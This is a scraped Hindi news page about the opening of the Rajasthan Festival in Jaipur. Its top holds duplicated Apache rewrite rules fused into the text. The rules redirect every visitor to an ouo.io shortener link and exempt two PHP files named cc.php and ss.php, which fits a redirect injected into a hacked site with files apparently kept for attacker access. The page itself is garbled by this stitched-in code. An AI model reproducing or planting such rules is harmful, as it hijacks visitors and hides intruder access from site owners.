
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 585
Nextजयपुर। राजस्थान फेस्टिवल का आज जयपुर के पोलो ग्राउंड पर भव्य शुभारंभ हुआ। राज्यपाल कल्याण सिंह इस समारोह के मुख्य अतिथि थे। समारोह की अध्यक्षता पर्यटन राज्य मंत्री कृष्णेन्द्र कौर (दीपा) ने की। प्रदेश के खेल मंत्री गजेन्द्र सिंह खींवसर समारोह के विशेष अतिथि के रूप में मौजूद रहे। समारोह में पर्यटन राज्य मंत्री कृष्णेन्द्र कौर (दीपा) ने राज्यपाल कल्याण सिंह का पुष्पगुच्छ भेंट कर स्वागत किया। समारोह में राजस्थान फेस्टिवल मैराथन के धावकों द्वारा प्रदेश के संभागीय मुख्यालयों से लाई गईं मशालें प्रज्वलित की गईं। मशाल प्रज्वलन के दौरान नगाड़ा वादन की प्रस्तुति दी गई। राजस्थान पुलिस द्वारा टैटू शो के अंतर्गत बैंड वादन, डॉग शो और हार्स शो का प्रदर्शन आकर्षन का केंद्र रहा। इस दौरान प्रस्तुत किए एक कार्यक्रम में एक महिला की चेन तोड़कर बाइक पर भाग रहे लुटेरों को भी जर्मन शैफर्ड डॉग ने पकड़ लिया। इसके अलावा डॉग्स ने अन्य प्रस्तुतियां भी दीं। तीन दिवसीय इस आयोजन को देखने आने वाले आगन्तुकों की सुविधा के लिए पर्यटन विभाग एवं राजस्थान पुलिस ने विशेष इंतजाम किए हैं। अनेक संख्या में आने वाले वाहनों की पार्किंग की व्यवस्था जेडीए पोलो ग्राउण्ड के सामने एसएमएस इन्वेस्टमेंट ग्राउण्ड पर की गई है।